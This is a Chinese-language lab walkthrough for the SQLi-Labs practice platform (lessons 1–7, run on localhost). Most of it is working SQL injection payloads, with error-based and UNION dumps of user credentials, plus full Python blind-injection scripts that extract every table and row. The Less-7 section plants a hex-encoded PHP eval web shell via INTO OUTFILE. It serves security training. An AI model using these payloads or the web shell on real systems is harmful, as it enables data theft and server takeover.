SqliLab 题解

SqliLab 每日一注

介绍

SQLI-LABS 是一个 SQL 注入练习平台, 包含了基础的 sql 注入案例,挺好玩的
项目地址在这

安装

将源代码复制到 Apache webroot 文件夹(htdocs,/var/www)
打开 sql-connections 文件夹下的"db-creds.inc"文件
修改 mysql 用户名和密码为你自己的
打开浏览器,通过 localhost 的 index.html 访问文件夹
点击 setup/resetDB 就会在你的 mysql 中创造数据库
开始日站咯

Day1-Less1

分析

select *,* from XX where id = '$id' LIMIT 0,1
select *,* from XX where id = '' or 1=1 limit 1,2--+' LIMIT 0,1
http://localhost/sqllab/Less-1/?id=' or 0 union all SELECT 0,TABLE_SCHEMA,TABLE_NAME FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='security' limit 3,4 --+

http://localhost/sqllab/Less-1/?id=' or 0 union all SELECT 0,TABLE_NAME,COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA ='security' limit 1,2 --+

http://localhost/sqllab/Less-1/?id=' or 0 union all SELECT 0,username,password FROM security.users limit 1,2 --+


数据库版本: @@version
查看 MySQL 的当前用户 USER()
INFORMATION_SCHEMA.COLUMNS
INFORMATION_SCHEMA.TABLES


select *,* from XX where id = '

' LIMIT 0,1

http://localhost/sqllab/Less-1/?id=' or 1=(SELECT length(TABLE_NAME FROM) INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='security' limit 0,1) --+

记录一下技巧
select group_concat(username) from users;
(sleep(ascii(mid(user()from(2)for(1)))=109))

比如在 mysql 中我们可以使用如下的经典语句进行报错。
select 1,2 union select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x;

这是网上流传很广的一个版本,可以简化成如下的形式。
select count(*) from information_schema.tables group by concat(version(),floor(rand(0)*2))

如果关键的表被禁用了,可以使用这种形式
select count(*) from (select 1 union select null union select !1)x group by concat(version(),floor(rand(0)*2));

如果 rand 被禁用了可以使用用户变量来报错
select min(@a:=1) from information_schema.tables group by concat(password,@a:=(@a+1)%2)
其实这是 mysql 的一个 bug 所引起的,其他数据库都不会因为这个问题而报错。

代码

from requests import get

def GuessDBLength():
    """Return the length of the current database name (boolean blind probe).

    Sends one GET per candidate length, counting up from 0, and treats the
    substring 'Your Login name' in the response body as the "true" signal.
    There is no upper bound: the loop ends only when a candidate matches.
    """
    print '[+]Guessing DBLength'
    i = 0
    while 1:
        r = get("http://localhost/sqllab/Less-1/?id=0' or length(database())=%d--+" %i)
        html = r.text
        if 'Your Login name' in html:
            print ' [-]The DatabaseNameLength is', i
            return i
        i+=1

def GuessDBName(length):
    """Recover the database name one character at a time.

    For each 1-based position up to *length*, tries ASCII codes 0-126 in
    order and keeps the first one the oracle confirms ('Your Login name'
    in the response). A position where no code matches is skipped without
    error, so the returned string can be shorter than *length*.
    """
    print '[+]Guessing DBName'
    name = ''
    for i in xrange(length):
        for n in xrange(127):
            r = get("http://localhost/sqllab/Less-1/?id=0' or ascii(SUBSTR(database(),%d,1))='%d'--+" %(i+1,n))
            html = r.text
            if 'Your Login name' in html:
                name += chr(n)
                print ' [-]', name
                break
    print ' [-]DBName is:', name
    return name

def GuessTBsNum(name):
    """Return the number of tables in schema *name*.

    Counts upward from 0, one GET per candidate, comparing the candidate
    server-side with count(TABLE_NAME) from INFORMATION_SCHEMA.TABLES.
    The first candidate whose response contains 'Your Login name' is
    returned (via break, then the return below). Unbounded loop.
    """
    print '[+]Guessing Tables num'
    i = 0
    while 1:
        r = get("http://localhost/sqllab/Less-1/?id=' or %d=(SELECT count(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s') --+" %(i,name))
        html = r.text
        if 'Your Login name' in html:
            print ' [-]The Tables num is', i
            break
        i+=1
    return i

def GuessTBNameLenth(n, name):
    """Return the length of the table name at LIMIT offset *n* (0-based) in schema *name*.

    Probes positions i = 1, 2, ... using ascii(SUBSTR(..., i, 1)) as the
    condition and stops at the first position where the oracle does NOT
    fire (presumably SUBSTR past the end yields '' and ascii('') is 0 --
    MySQL semantics, not checked here); returns i-1.
    """
    print '[+]Guessing TableName Length'
    i = 1
    while 1:
        r = get("http://localhost/sqllab/Less-1/?id=' or ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.tables where TABLE_SCHEMA ='%s' limit %d,1),%d,1)) --+" %(name,n,i))
        html = r.text
        if 'Your Login name' not in html:
            print ' [-]The TableName Lenth is', i-1
            return i-1
        i+=1

def GuessTBsNames(num, DBName):
    """Recover the names of the first *num* tables in schema *DBName*.

    For each table offset, first asks GuessTBNameLenth for the name length,
    then recovers each character by trying ASCII codes 0-126 and keeping the
    first one the oracle confirms. Returns the names in offset order; a
    position with no matching code is skipped silently.
    """
    TBsNames = []
    for no in range(num):
        name = ''
        length = GuessTBNameLenth(no, DBName)
        print ' [-]Guessing Table Name'
        for i in xrange(length):
            for n in xrange(127):
                r = get("http://localhost/sqllab/Less-1/?id=' or ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s' limit %d,1),%d,1))='%d' --+" %(DBName,no,i+1,n))
                html = r.text
                if 'Your Login name' in html:
                    name += chr(n)
                    print ' [-]', name
                    break
        TBsNames.append(name)
    print ' [-]All Tables Names is:', TBsNames
    return TBsNames

def GuessCLMNum(tname,dname):
    """Return the column count of table *tname* in schema *dname*.

    Counts upward from 0, one GET per candidate, until the response body
    contains 'Your Login name'. Unbounded loop.
    """
    print '[+]Guessing Colunms num'
    i = 0
    while 1:
        r = get("http://localhost/sqllab/Less-1/?id=' or %d=(SELECT count(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s') --+" %(i,tname,dname))
        html = r.text
        if 'Your Login name' in html:
            print ' [-]The Colunm num is', i
            return i
        i+=1

def GuessCLMLen(cnum, tname, dname):
    """Return the length of the column name at LIMIT offset *cnum* (0-based).

    Same stop rule as GuessTBNameLenth: the first position i whose
    ascii(SUBSTR(...)) condition does not fire ends the scan; returns i-1.
    """
    i = 1
    while 1:
        r = get("http://localhost/sqllab/Less-1/?id=' or ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s' limit %d,1),%d,1)) --+" %(tname,dname,cnum,i))
        html = r.text
        if 'Your Login name' not in html:
            print ' [-]The Colunm Lenth is', i-1
            return i-1
        i+=1

def GuessCLMName(DBName, TNames):
    """Recover every column name of each table in *TNames*, then dump the column.

    Per table: GuessCLMNum gives the column count; per column, GuessCLMLen
    gives the name length and each character is found by trying ASCII codes
    0-126 (first confirmed code wins). Once a column name is complete,
    GuessDatas is called for that column; its result, bound to ``data``, is
    never used. Prints the column list per table and returns None.
    """
    for tname in TNames:
        print '[+]Guessing Colunms for', tname
        CLMNames = []
        for cnum in range(GuessCLMNum(tname,DBName)):
            length = GuessCLMLen(cnum, tname, DBName)
            name = ''
            for i in xrange(length):
                for n in xrange(127):
                    r = get("http://localhost/sqllab/Less-1/?id=' or ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s' limit %d,1),%d,1))='%d' --+" %(tname,DBName,cnum,i+1,n))
                    html = r.text
                    if 'Your Login name' in html:
                        name += chr(n)
                        print ' [-]', name
                        break

            # Side effect only: the returned list is discarded.
            data = GuessDatas(DBName, tname, name)
            CLMNames.append(name)
        print ' [-]The Colunms are',CLMNames


def GuessDatasnum(dname, tname, cname):
    """Return the row count of *dname*.*tname* as reported by count(*cname*).

    Counts upward from 0 until the response contains 'Your Login name'.
    Unbounded loop.
    """
    i = 0
    while 1:
        r = get("http://localhost/sqllab/Less-1/?id=' or %d=(SELECT count(%s) FROM %s.%s) --+" %(i,cname,dname,tname))
        html = r.text
        if 'Your Login name' in html:
            print ' [-]The Datas num is', i
            return i
        i+=1

def GuessDataLen(dname, tname, cname, n):
    """Return the length of column *cname* in the row at LIMIT offset *n* (0-based).

    Scans positions 1, 2, ... and returns i-1 at the first position where
    the oracle does not fire.
    """
    print ' [-]Guessing data length'
    i = 1
    while 1:
        r = get("http://localhost/sqllab/Less-1/?id=' or ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1)) --+" %(cname, dname, tname, n, i))
        html = r.text
        if 'Your Login name' not in html:
            print ' [-]The Data Lenth is', i-1
            return i-1
        i+=1

def GuessDatas(dname, tname, cname):
    """Recover the value of column *cname* for every row of *dname*.*tname*.

    Row count comes from GuessDatasnum, per-row length from GuessDataLen,
    and each character is found by trying ASCII codes 0-126. The request is
    wrapped in a retry loop: any exception raised by get() prints
    'Relaxing...' and the request is reissued immediately, with no delay
    and no attempt limit. Returns the recovered values in row order.
    """
    datanum = GuessDatasnum(dname, tname, cname)
    Data = []
    for no in range(datanum):
        length = GuessDataLen(dname, tname, cname, no)
        print ' [-]Guessing data'
        name = ''
        for i in xrange(length):
            for n in xrange(127):
                while 1:
                    try:
                        r = get("http://localhost/sqllab/Less-1/?id=' or ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1))='%d' --+" %(cname, dname, tname, no,i+1,n))
                        break
                    except:  # bare except: retries on every error type
                        print 'Relaxing...'
                html = r.text
                if 'Your Login name' in html:
                    name += chr(n)
                    print ' [-]', name
                    break
        Data.append(name)
    print ' [-]All Datas of %s is:' %cname, Data
    return Data


# Driver: database name -> table names -> column names; GuessCLMName also
# dumps each column's rows through GuessDatas. Runs at import time (no
# __main__ guard).
DBLength = GuessDBLength()
DBName = GuessDBName(DBLength)
print
TBsNum = GuessTBsNum(DBName)
TBsNames = GuessTBsNames(TBsNum, DBName)
print
GuessCLMName(DBName, TBsNames)
print '[!]All Done!'

Day2-Less2

分析

select *,* from XX where id = $id LIMIT 0,1

select *,* from XX where id = 0 union all SELECT 0,username,password FROM security.users limit 1,2 --+ LIMIT 0,1
http://localhost/sqllab/Less-1/?id= 0 union all SELECT 0,TABLE_NAME,COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA ='security' limit 1,2 --+


代码

from requests import get

def GuessDBLength():
    """Return the length of the current database name (boolean blind probe).

    Sends one GET per candidate length, counting up from 0, and treats the
    substring 'Your Login name' in the response body as the "true" signal.
    There is no upper bound: the loop ends only when a candidate matches.
    """
    print '[+]Guessing DBLength'
    i = 0
    while 1:
        r = get("http://localhost/sqllab/Less-2/?id=0 or length(database())=%d--+" %i)
        html = r.text
        if 'Your Login name' in html:
            print ' [-]The DatabaseNameLength is', i
            return i
        i+=1

def GuessDBName(length):
    """Recover the database name one character at a time.

    For each 1-based position up to *length*, tries ASCII codes 0-126 in
    order and keeps the first one the oracle confirms ('Your Login name'
    in the response). A position where no code matches is skipped without
    error, so the returned string can be shorter than *length*.
    """
    print '[+]Guessing DBName'
    name = ''
    for i in xrange(length):
        for n in xrange(127):
            r = get("http://localhost/sqllab/Less-2/?id=0 or ascii(SUBSTR(database(),%d,1))='%d'--+" %(i+1,n))
            html = r.text
            if 'Your Login name' in html:
                name += chr(n)
                print ' [-]', name
                break
    print ' [-]DBName is:', name
    return name

def GuessTBsNum(name):
    """Return the number of tables in schema *name*.

    Counts upward from 0, one GET per candidate, comparing the candidate
    server-side with count(TABLE_NAME) from INFORMATION_SCHEMA.TABLES.
    The first candidate whose response contains 'Your Login name' is
    returned (via break, then the return below). Unbounded loop.
    """
    print '[+]Guessing Tables num'
    i = 0
    while 1:
        r = get("http://localhost/sqllab/Less-2/?id=-1 or %d=(SELECT count(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s') --+" %(i,name))
        html = r.text
        if 'Your Login name' in html:
            print ' [-]The Tables num is', i
            break
        i+=1
    return i

def GuessTBNameLenth(n, name):
    """Return the length of the table name at LIMIT offset *n* (0-based) in schema *name*.

    Probes positions i = 1, 2, ... using ascii(SUBSTR(..., i, 1)) as the
    condition and stops at the first position where the oracle does NOT
    fire (presumably SUBSTR past the end yields '' and ascii('') is 0 --
    MySQL semantics, not checked here); returns i-1.
    """
    print '[+]Guessing TableName Length'
    i = 1
    while 1:
        r = get("http://localhost/sqllab/Less-2/?id=-1 or ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.tables where TABLE_SCHEMA ='%s' limit %d,1),%d,1)) --+" %(name,n,i))
        html = r.text
        if 'Your Login name' not in html:
            print ' [-]The TableName Lenth is', i-1
            return i-1
        i+=1

def GuessTBsNames(num, DBName):
    """Recover the names of the first *num* tables in schema *DBName*.

    For each table offset, first asks GuessTBNameLenth for the name length,
    then recovers each character by trying ASCII codes 0-126 and keeping the
    first one the oracle confirms. Returns the names in offset order; a
    position with no matching code is skipped silently.
    """
    TBsNames = []
    for no in range(num):
        name = ''
        length = GuessTBNameLenth(no, DBName)
        print ' [-]Guessing Table Name'
        for i in xrange(length):
            for n in xrange(127):
                r = get("http://localhost/sqllab/Less-2/?id=-1 or ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s' limit %d,1),%d,1))='%d' --+" %(DBName,no,i+1,n))
                html = r.text
                if 'Your Login name' in html:
                    name += chr(n)
                    print ' [-]', name
                    break
        TBsNames.append(name)
    print ' [-]All Tables Names is:', TBsNames
    return TBsNames

def GuessCLMNum(tname,dname):
    """Return the column count of table *tname* in schema *dname*.

    Counts upward from 0, one GET per candidate, until the response body
    contains 'Your Login name'. Unbounded loop.
    """
    print '[+]Guessing Colunms num'
    i = 0
    while 1:
        r = get("http://localhost/sqllab/Less-2/?id=-1 or %d=(SELECT count(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s') --+" %(i,tname,dname))
        html = r.text
        if 'Your Login name' in html:
            print ' [-]The Colunm num is', i
            return i
        i+=1

def GuessCLMLen(cnum, tname, dname):
    """Return the length of the column name at LIMIT offset *cnum* (0-based).

    Same stop rule as GuessTBNameLenth: the first position i whose
    ascii(SUBSTR(...)) condition does not fire ends the scan; returns i-1.
    """
    i = 1
    while 1:
        r = get("http://localhost/sqllab/Less-2/?id=-1 or ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s' limit %d,1),%d,1)) --+" %(tname,dname,cnum,i))
        html = r.text
        if 'Your Login name' not in html:
            print ' [-]The Colunm Lenth is', i-1
            return i-1
        i+=1

def GuessCLMName(DBName, TNames):
    """Recover every column name of each table in *TNames*, then dump the column.

    Per table: GuessCLMNum gives the column count; per column, GuessCLMLen
    gives the name length and each character is found by trying ASCII codes
    0-126 (first confirmed code wins). Once a column name is complete,
    GuessDatas is called for that column; its result, bound to ``data``, is
    never used. Prints the column list per table and returns None.
    """
    for tname in TNames:
        print '[+]Guessing Colunms for', tname
        CLMNames = []
        for cnum in range(GuessCLMNum(tname,DBName)):
            length = GuessCLMLen(cnum, tname, DBName)
            name = ''
            for i in xrange(length):
                for n in xrange(127):
                    r = get("http://localhost/sqllab/Less-2/?id=-1 or ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s' limit %d,1),%d,1))='%d' --+" %(tname,DBName,cnum,i+1,n))
                    html = r.text
                    if 'Your Login name' in html:
                        name += chr(n)
                        print ' [-]', name
                        break

            # Side effect only: the returned list is discarded.
            data = GuessDatas(DBName, tname, name)
            CLMNames.append(name)
        print ' [-]The Colunms are',CLMNames


def GuessDatasnum(dname, tname, cname):
    """Return the row count of *dname*.*tname* as reported by count(*cname*).

    Counts upward from 0 until the response contains 'Your Login name'.
    Unbounded loop.
    """
    i = 0
    while 1:
        r = get("http://localhost/sqllab/Less-2/?id=-1 or %d=(SELECT count(%s) FROM %s.%s) --+" %(i,cname,dname,tname))
        html = r.text
        if 'Your Login name' in html:
            print ' [-]The Datas num is', i
            return i
        i+=1

def GuessDataLen(dname, tname, cname, n):
    """Return the length of column *cname* in the row at LIMIT offset *n* (0-based).

    Scans positions 1, 2, ... and returns i-1 at the first position where
    the oracle does not fire.
    """
    print ' [-]Guessing data length'
    i = 1
    while 1:
        r = get("http://localhost/sqllab/Less-2/?id=-1 or ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1)) --+" %(cname, dname, tname, n, i))
        html = r.text
        if 'Your Login name' not in html:
            print ' [-]The Data Lenth is', i-1
            return i-1
        i+=1

def GuessDatas(dname, tname, cname):
    """Recover the value of column *cname* for every row of *dname*.*tname*.

    Row count comes from GuessDatasnum, per-row length from GuessDataLen,
    and each character is found by trying ASCII codes 0-126. The request is
    wrapped in a retry loop: any exception raised by get() prints
    'Relaxing...' and the request is reissued immediately, with no delay
    and no attempt limit. Returns the recovered values in row order.
    """
    datanum = GuessDatasnum(dname, tname, cname)
    Data = []
    for no in range(datanum):
        length = GuessDataLen(dname, tname, cname, no)
        print ' [-]Guessing data'
        name = ''
        for i in xrange(length):
            for n in xrange(127):
                while 1:
                    try:
                        r = get("http://localhost/sqllab/Less-2/?id=-1 or ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1))='%d' --+" %(cname, dname, tname, no,i+1,n))
                        break
                    except:  # bare except: retries on every error type
                        print 'Relaxing...'
                html = r.text
                if 'Your Login name' in html:
                    name += chr(n)
                    print ' [-]', name
                    break
        Data.append(name)
    print ' [-]All Datas of %s is:' %cname, Data
    return Data


# Driver: database name -> table names -> column names; GuessCLMName also
# dumps each column's rows through GuessDatas. Runs at import time (no
# __main__ guard).
DBLength = GuessDBLength()
DBName = GuessDBName(DBLength)
print
TBsNum = GuessTBsNum(DBName)
TBsNames = GuessTBsNames(TBsNum, DBName)
print
GuessCLMName(DBName, TBsNames)
print '[!]All Done!'

Day3-Less3

分析

select *,* from XX where id = '($id)' LIMIT 0,1
select *,* from XX where id = ('$id') LIMIT 0,1

select *,* from XX where id = '(1)' LIMIT 0,1
select *,* from XX where id = '()' --+)' LIMIT 0,1
select *,* from XX where id = ('1') --+') LIMIT 0,1

select *,* from XX where id = ('
1') or 0 union all SELECT 0,TABLE_NAME,COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA ='security' limit 1,2 --+
') LIMIT 0,1

代码

from requests import get

def GuessDBLength():
    """Return the length of the current database name (boolean blind probe).

    Sends one GET per candidate length, counting up from 0, and treats the
    substring 'Your Login name' in the response body as the "true" signal.
    There is no upper bound: the loop ends only when a candidate matches.
    """
    print '[+]Guessing DBLength'
    i = 0
    while 1:
        r = get("http://localhost/sqllab/Less-3/?id=0') or length(database())=%d--+" %i)
        html = r.text
        if 'Your Login name' in html:
            print ' [-]The DatabaseNameLength is', i
            return i
        i+=1

def GuessDBName(length):
    """Recover the database name one character at a time.

    For each 1-based position up to *length*, tries ASCII codes 0-126 in
    order and keeps the first one the oracle confirms ('Your Login name'
    in the response). A position where no code matches is skipped without
    error, so the returned string can be shorter than *length*.
    """
    print '[+]Guessing DBName'
    name = ''
    for i in xrange(length):
        for n in xrange(127):
            r = get("http://localhost/sqllab/Less-3/?id=0') or ascii(SUBSTR(database(),%d,1))='%d'--+" %(i+1,n))
            html = r.text
            if 'Your Login name' in html:
                name += chr(n)
                print ' [-]', name
                break
    print ' [-]DBName is:', name
    return name

def GuessTBsNum(name):
    """Return the number of tables in schema *name*.

    Counts upward from 0, one GET per candidate, comparing the candidate
    server-side with count(TABLE_NAME) from INFORMATION_SCHEMA.TABLES.
    The first candidate whose response contains 'Your Login name' is
    returned (via break, then the return below). Unbounded loop.
    """
    print '[+]Guessing Tables num'
    i = 0
    while 1:
        r = get("http://localhost/sqllab/Less-3/?id=') or %d=(SELECT count(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s') --+" %(i,name))
        html = r.text
        if 'Your Login name' in html:
            print ' [-]The Tables num is', i
            break
        i+=1
    return i

def GuessTBNameLenth(n, name):
    """Return the length of the table name at LIMIT offset *n* (0-based) in schema *name*.

    Probes positions i = 1, 2, ... using ascii(SUBSTR(..., i, 1)) as the
    condition and stops at the first position where the oracle does NOT
    fire (presumably SUBSTR past the end yields '' and ascii('') is 0 --
    MySQL semantics, not checked here); returns i-1.
    """
    print '[+]Guessing TableName Length'
    i = 1
    while 1:
        r = get("http://localhost/sqllab/Less-3/?id=') or ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.tables where TABLE_SCHEMA ='%s' limit %d,1),%d,1)) --+" %(name,n,i))
        html = r.text
        if 'Your Login name' not in html:
            print ' [-]The TableName Lenth is', i-1
            return i-1
        i+=1

def GuessTBsNames(num, DBName):
    """Recover the names of the first *num* tables in schema *DBName*.

    For each table offset, first asks GuessTBNameLenth for the name length,
    then recovers each character by trying ASCII codes 0-126 and keeping the
    first one the oracle confirms. Returns the names in offset order; a
    position with no matching code is skipped silently.
    """
    TBsNames = []
    for no in range(num):
        name = ''
        length = GuessTBNameLenth(no, DBName)
        print ' [-]Guessing Table Name'
        for i in xrange(length):
            for n in xrange(127):
                r = get("http://localhost/sqllab/Less-3/?id=') or ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s' limit %d,1),%d,1))='%d' --+" %(DBName,no,i+1,n))
                html = r.text
                if 'Your Login name' in html:
                    name += chr(n)
                    print ' [-]', name
                    break
        TBsNames.append(name)
    print ' [-]All Tables Names is:', TBsNames
    return TBsNames

def GuessCLMNum(tname,dname):
    """Return the column count of table *tname* in schema *dname*.

    Counts upward from 0, one GET per candidate, until the response body
    contains 'Your Login name'. Unbounded loop.
    """
    print '[+]Guessing Colunms num'
    i = 0
    while 1:
        r = get("http://localhost/sqllab/Less-3/?id=') or %d=(SELECT count(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s') --+" %(i,tname,dname))
        html = r.text
        if 'Your Login name' in html:
            print ' [-]The Colunm num is', i
            return i
        i+=1

def GuessCLMLen(cnum, tname, dname):
    """Return the length of the column name at LIMIT offset *cnum* (0-based).

    Same stop rule as GuessTBNameLenth: the first position i whose
    ascii(SUBSTR(...)) condition does not fire ends the scan; returns i-1.
    """
    i = 1
    while 1:
        r = get("http://localhost/sqllab/Less-3/?id=') or ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s' limit %d,1),%d,1)) --+" %(tname,dname,cnum,i))
        html = r.text
        if 'Your Login name' not in html:
            print ' [-]The Colunm Lenth is', i-1
            return i-1
        i+=1

def GuessCLMName(DBName, TNames):
    """Recover every column name of each table in *TNames*, then dump the column.

    Per table: GuessCLMNum gives the column count; per column, GuessCLMLen
    gives the name length and each character is found by trying ASCII codes
    0-126 (first confirmed code wins). Once a column name is complete,
    GuessDatas is called for that column; its result, bound to ``data``, is
    never used. Prints the column list per table and returns None.
    """
    for tname in TNames:
        print '[+]Guessing Colunms for', tname
        CLMNames = []
        for cnum in range(GuessCLMNum(tname,DBName)):
            length = GuessCLMLen(cnum, tname, DBName)
            name = ''
            for i in xrange(length):
                for n in xrange(127):
                    r = get("http://localhost/sqllab/Less-3/?id=') or ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s' limit %d,1),%d,1))='%d' --+" %(tname,DBName,cnum,i+1,n))
                    html = r.text
                    if 'Your Login name' in html:
                        name += chr(n)
                        print ' [-]', name
                        break

            # Side effect only: the returned list is discarded.
            data = GuessDatas(DBName, tname, name)
            CLMNames.append(name)
        print ' [-]The Colunms are',CLMNames


def GuessDatasnum(dname, tname, cname):
    """Return the row count of *dname*.*tname* as reported by count(*cname*).

    Counts upward from 0 until the response contains 'Your Login name'.
    Unbounded loop.
    """
    i = 0
    while 1:
        r = get("http://localhost/sqllab/Less-3/?id=') or %d=(SELECT count(%s) FROM %s.%s) --+" %(i,cname,dname,tname))
        html = r.text
        if 'Your Login name' in html:
            print ' [-]The Datas num is', i
            return i
        i+=1

def GuessDataLen(dname, tname, cname, n):
    """Return the length of column *cname* in the row at LIMIT offset *n* (0-based).

    Scans positions 1, 2, ... and returns i-1 at the first position where
    the oracle does not fire.
    """
    print ' [-]Guessing data length'
    i = 1
    while 1:
        r = get("http://localhost/sqllab/Less-3/?id=') or ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1)) --+" %(cname, dname, tname, n, i))
        html = r.text
        if 'Your Login name' not in html:
            print ' [-]The Data Lenth is', i-1
            return i-1
        i+=1

def GuessDatas(dname, tname, cname):
    """Recover the value of column *cname* for every row of *dname*.*tname*.

    Row count comes from GuessDatasnum, per-row length from GuessDataLen,
    and each character is found by trying ASCII codes 0-126. The request is
    wrapped in a retry loop: any exception raised by get() prints
    'Relaxing...' and the request is reissued immediately, with no delay
    and no attempt limit. Returns the recovered values in row order.
    """
    datanum = GuessDatasnum(dname, tname, cname)
    Data = []
    for no in range(datanum):
        length = GuessDataLen(dname, tname, cname, no)
        print ' [-]Guessing data'
        name = ''
        for i in xrange(length):
            for n in xrange(127):
                while 1:
                    try:
                        r = get("http://localhost/sqllab/Less-3/?id=') or ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1))='%d' --+" %(cname, dname, tname, no,i+1,n))
                        break
                    except:  # bare except: retries on every error type
                        print 'Relaxing...'
                html = r.text
                if 'Your Login name' in html:
                    name += chr(n)
                    print ' [-]', name
                    break
        Data.append(name)
    print ' [-]All Datas of %s is:' %cname, Data
    return Data

# Driver: database name -> table names -> column names; GuessCLMName also
# dumps each column's rows through GuessDatas. Runs at import time (no
# __main__ guard).
DBLength = GuessDBLength()
DBName = GuessDBName(DBLength)
print
TBsNum = GuessTBsNum(DBName)
TBsNames = GuessTBsNames(TBsNum, DBName)
print
GuessCLMName(DBName, TBsNames)
print '[!]All Done!'

Day4-Less4

分析

select *,* from XX where id = "($id)" LIMIT 0,1
select *,* from XX where id = ("$id") LIMIT 0,1

select *,* from XX where id = ("") LIMIT 0,1

select *,* from XX where id = ("
1") or 0 union all SELECT 0,TABLE_NAME,COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA ='security' limit 1,2 --+
') LIMIT 0,1

Day5-Less5

分析

select *,* from XX where id = '$id' LIMIT 0,1

select *,* from XX where id = '1' order by 3--+' LIMIT 0,1
3

' or 0 union all SELECT 0,1,2 FROM k--+
库名 security

concat(user(),floor(rand(0)*2))

select *,* from XX where id='
' union select 1,2,3 from INFORMATION_SCHEMA.tables where extractvalue(1,concat(user(),'*',@@version,'*',(select TABLE_NAME from INFORMATION_SCHEMA.tables where TABLE_NAME limit 102,1))) --+
' LIMIT 0,1

http://localhost/sqllab/Less-5/?id=' union select 1,2,3 from INFORMATION_SCHEMA.tables where extractvalue(1,concat(user(),'*',@@version,'*',(select SCHEMA_NAME from INFORMATION_SCHEMA.SCHEMATA limit 1,1)))

where extractvalue(1,concat('*',(select TABLE_NAME from INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA='security' limit 2,1),'*'));

http://localhost/sqllab/Less-5/?id=' union select 1,2,3 from INFORMATION_SCHEMA.tables where extractvalue(1,concat('*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1))) --+
遍历 0 即可
(extractvalue 有长度限制,最长 32 位)

或者
http://localhost/sqllab/Less-5/?id=' union select 1,2,3 from INFORMATION_SCHEMA.tables where updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1)),1) --+
(updatexml 有长度限制,最长 32 位)

或者
http://localhost/sqllab/Less-5/?id=' union select count(*),2,3 from INFORMATION_SCHEMA.tables group by concat('*',floor(rand(0)*2),'*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1))--+

或者
http://localhost/sqllab/Less-5/?id=' or 1 group by concat_ws('*',(select username from security.users limit 0,1),(select password from security.users limit 0,1),floor(rand(0)*2)) having min(0) --+

或者
http://localhost/sqllab/Less-5/?id=' union select (concat_ws('*', (select username from security.users limit 0,1),(select password from security.users limit 0,1), floor(rand(0)*2))), count(*), 3 from security.users group by 1 --+

Day6-Less6

分析

select *,* from XX where id = "$id" LIMIT 0,1

http://localhost/sqllab/Less-6/?id=" union select count(*),2,3 from INFORMATION_SCHEMA.tables group by concat('*',floor(rand(0)*2),'*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1))--+

Day7-Less7

分析

select *,* from XX where id = (('$id')) LIMIT 0,1

http://localhost/sqllab/Less-7/?id=')) or 0 union all SELECT 0,TABLE_NAME,COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA ='security' INTO OUTFILE "C:\\Users\\Troy\\Desktop\\1.txt" --+

select id,username,password from users where id = (('
')) or 0 union all SELECT 0,TABLE_NAME,COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA ='security' INTO OUTFILE "C:\\Users\\Troy\\Desktop\\1.txt"; --+
')) LIMIT 0,1

localhost/sqllab/Less-7/?id=')) or 0 union all SELECT 0,TABLE_NAME,COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA ='security' INTO OUTFILE "1.txt"; --+

')) or 0 union all SELECT 0x3c3f706870206576616c28245f504f53545b78696d6f5d293b203f3e,2,3 into outfile "/weshell.php" --+
